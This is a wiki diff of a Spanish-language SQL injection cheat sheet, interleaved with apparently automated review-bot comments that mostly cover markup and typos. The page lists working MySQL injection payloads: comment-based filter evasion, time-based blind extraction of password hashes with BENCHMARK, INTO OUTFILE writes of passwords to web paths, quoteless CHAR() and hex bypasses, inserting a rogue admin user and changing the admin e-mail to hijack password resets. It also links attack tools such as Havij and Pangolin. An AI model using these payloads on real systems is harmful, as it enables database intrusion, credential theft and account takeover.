
Differences

Shows the differences between two versions of the page.

seguridad:sql_injection [2013/03/18 09:43] lc
seguridad:sql_injection [2023/01/18 14:11] (current) – external editor 127.0.0.1
Línea 1: Línea 1:
 ==== SQL Injection ==== ==== SQL Injection ====
 === Técnicas === === Técnicas ===
 +<file>
   * /**/   * /**/
   * /*--*/   * /*--*/
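Review bot: the `<file>` opened right after `=== Técnicas ===` makes everything up to `</file>` verbatim text, so the `*` bullet markers on `* /**/`, `* /*--*/` and the following entries will now render literally instead of as a list; either drop the bullets inside the `<file>` block or keep the list and leave `<file>` out. The list also still has no introductory sentence saying what these tokens are, so a reader landing on the heading sees bare `/**/` and `%0A` entries with no context.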
Línea 7: Línea 8:
   * %0A   * %0A
   * %0D   * %0D
 +</file>
  
-<note>Extraido de 0x000000.com</note> +=== Técnicas extraidas de 0x000000.com  === 
-<code>+<code sql>
 1 SELECT * FROM login /* foobar */ 1 SELECT * FROM login /* foobar */
 2 SELECT * FROM login WHERE id = 1 or 1=1 2 SELECT * FROM login WHERE id = 1 or 1=1
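Review bot: promoting the `<note>Extraido de 0x000000.com</note>` attribution to a `=== Técnicas extraidas de 0x000000.com  ===` heading puts the source in the table of contents, which is good, but `extraidas` needs its accent (`extraídas`) and there is a doubled space before the closing `===`. In the same hunk `<code>` becomes `<code sql>`; the numerals `1`, `2`, … at the start of each line are part of the block content (residue from the source site, not wiki line numbering), so the sql highlighter will mark them as integer literals on every line. The same applies to every other `<code>` → `<code sql>` change in this diff.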
Línea 39: Línea 41:
 </code> </code>
 Variations: Variations:
-<code>+<code sql>
 01 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 01 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
 02 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%" 02 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"
Línea 53: Línea 55:
 </code> </code>
 Blind injection vectors collection Blind injection vectors collection
-<code>+<code sql>
 Operators Operators
  
Línea 60: Línea 62:
 3 SELECT 1 XOR 0; 3 SELECT 1 XOR 0;
 </code> </code>
-<code>+<code sql>
 Evaluate Evaluate
 1 all render TRUE or 1. 1 all render TRUE or 1.
Línea 67: Línea 69:
 4 SELECT ISNULL(1/0); 4 SELECT ISNULL(1/0);
 </code> </code>
-<code>+<code sql>
 Math Math
 1 SELECT FLOOR(7 + (RAND() * 5)); 1 SELECT FLOOR(7 + (RAND() * 5));
 2 SELECT ROUND(23.298, -1); 2 SELECT ROUND(23.298, -1);
 </code> </code>
-<code>+<code sql>
 Misc Misc
 1 SELECT LENGTH(COMPRESS(REPEAT('a',1000))); 1 SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
 2 SELECT MD5('abc'); 2 SELECT MD5('abc');
 </code> </code>
-<code>+<code sql>
 Benchmark Benchmark
 01 SELECT BENCHMARK(10000000,ENCODE('abc','123')); 01 SELECT BENCHMARK(10000000,ENCODE('abc','123'));
Línea 93: Línea 95:
 Beware of of the N rounds, add an extra zero and it could stall or crash your browser! Beware of of the N rounds, add an extra zero and it could stall or crash your browser!
 Gathering info Gathering info
-<code>+<code sql>
 Table mapping Table mapping
 1 SELECT COUNT(*) FROM tablename 1 SELECT COUNT(*) FROM tablename
 </code> </code>
-<code>+<code sql>
 Field mapping Field mapping
 1 SELECT * FROM tablename WHERE user LIKE "%root%" 1 SELECT * FROM tablename WHERE user LIKE "%root%"
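Review bot: the context line `Beware of of the N rounds` has a doubled `of`, and the sentence misplaces the cost: the BENCHMARK loop runs on the database server, not in the browser, so what stalls is the server, and a query like `SELECT BENCHMARK(10000000,ENCODE('abc','123'))` is exactly the kind of long-running statement a DBA will find in the database's slow query log. Consider rewording the warning to say where the load lands.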
Línea 104: Línea 106:
 4 SELECT * FROM tablename WHERE user = 'x' AND id IS NULL; 4 SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;
 </code> </code>
-<code>+<code sql>
 User mapping User mapping
 1 SELECT * FROM tablename WHERE email = 'user@site.com'; 1 SELECT * FROM tablename WHERE email = 'user@site.com';
Línea 110: Línea 112:
 3 SELECT * FROM tablename WHERE user = 'username' 3 SELECT * FROM tablename WHERE user = 'username'
 </code> </code>
-<code>+<code sql>
 Advanced SQL vectors Advanced SQL vectors
 Writing info into files. Writing info into files.
 1 SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt' 1 SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt'
 </code> </code>
-<code>+<code sql>
 Writing info into files without single quotes: (example) Writing info into files without single quotes: (example)
 1 SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110), 1 SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),
Línea 122: Línea 124:
 Note: You must specify a new file, it may not exists and give the correct pathname. Note: You must specify a new file, it may not exists and give the correct pathname.
 </code> </code>
-<code>+<code sql>
 The CHAR() quoteless function. The CHAR() quoteless function.
 1 SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105), 1 SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),
Línea 129: Línea 131:
 4 SELECT * FROM login WHERE user = CHAR(39,97,39) 4 SELECT * FROM login WHERE user = CHAR(39,97,39)
 </code> </code>
-<code>+<code sql>
 Extracting hashes Extracting hashes
 1 SELECT user FROM login WHERE user = 'root' 1 SELECT user FROM login WHERE user = 'root'
Línea 139: Línea 141:
  
 The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example. The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example.
-<code>+<code sql>
 01 SELECT user FROM login WHERE user = 'admin' 01 SELECT user FROM login WHERE user = 'admin'
 02 UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login1 02 UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login1
Línea 153: Línea 155:
 </code> </code>
 A quoteless example: A quoteless example:
-<code>+<code sql>
 1 SELECT user FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) 1 SELECT user FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
 2 UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97), BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login 2 UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97), BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login
Línea 161: Línea 163:
 Misc. Misc.
 Insert a new user into DB Insert a new user into DB
-<code>+<code sql>
 1 INSERT INTO login SET user = 'r00t', pass = 'abc' 1 INSERT INTO login SET user = 'r00t', pass = 'abc'
 </code> </code>
Línea 170: Línea 172:
  
 Write the DB user away into tmp Write the DB user away into tmp
-<code>1 SELECT host,user,password FROM user into outfile '/tmp/passwd';</code>+<code sql>1 SELECT host,user,password FROM user into outfile '/tmp/passwd';</code>
  
 Change admin e-mail, for "forgot login retrieval." Change admin e-mail, for "forgot login retrieval."
Línea 180: Línea 182:
  
 Using an HEX encoded query to bypass escaping. Using an HEX encoded query to bypass escaping.
-<code>+<code sql>
 1 Normal: SELECT * FROM login WHERE user = 'root' 1 Normal: SELECT * FROM login WHERE user = 'root'
 2 Bypass: SELECT * FROM login WHERE user = 0x726F6F74 2 Bypass: SELECT * FROM login WHERE user = 0x726F6F74
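Review bot: `Normal:` and `Bypass:` are prose labels sitting inside a `<code sql>` block, so with the new `sql` tag the highlighter treats them as identifiers and neither line is valid SQL as written. Move the labels outside the block or write them as SQL comments (`-- Normal`, `-- Bypass`); the inline `<code sql>1 SELECT HEX('root'); gives you: 726F6F74. then add: 0x before it.</code>` further down mixes prose into the block the same way.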
Línea 190: Línea 192:
 </code> </code>
 How to determin the HEX value for injection. How to determin the HEX value for injection.
-<code>1 SELECT HEX('root'); gives you: 726F6F74. then add: 0x before it.</code>+<code sql>1 SELECT HEX('root'); gives you: 726F6F74. then add: 0x before it.</code>
  
 With comments. With comments.
Línea 203: Línea 205:
  
  
-=== Herramientas === +==== Herramientas ==== 
-Havij -> http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/+  Havij -> http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/ 
 +  * Havij http://www.taringa.net/comunidades/hackers/3552526/ 
 +  * PonyMagic http://poneymagic.diosdelared.com 
 +  * General Injection Explorer  
 +  * Safe 3 sql injector http://sourceforge.net/projects/safe3si/files/latest/download?source=directory 
 +  * Enema http://code.google.com/p/enema/ 
 +  * Absinthe http://sourceforge.net/projects/absinthe/ 
 +  * Pangolin http://nosec.org/en/productservice/pangolin/ 
 +  * sql poison 
 +  * sql map gui 
 +  * bsql hacker http://labs.portcullis.co.uk/application/bsql-hacker/ 
 +  * 
  
  
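Review bot: Havij is listed twice in the new Herramientas section, once as the indented `Havij -> http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/` line and again as the `* Havij http://www.taringa.net/comunidades/hackers/3552526/` item; the first one has two leading spaces but no `*`, so DokuWiki renders it as a preformatted block rather than a list item. Keep one entry, preferably the vendor page rather than the community-forum link, and drop the empty trailing `*` item; `General Injection Explorer`, `sql poison` and `sql map gui` have neither a link nor a description.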
Línea 210: Línea 223:
 ==== Referencias ==== ==== Referencias ====
   * http://ha.ckers.org/sqlinjection/   * http://ha.ckers.org/sqlinjection/
 +  * http://www.antrax-labs.org/2012/01/sql-injection-desde-cero.html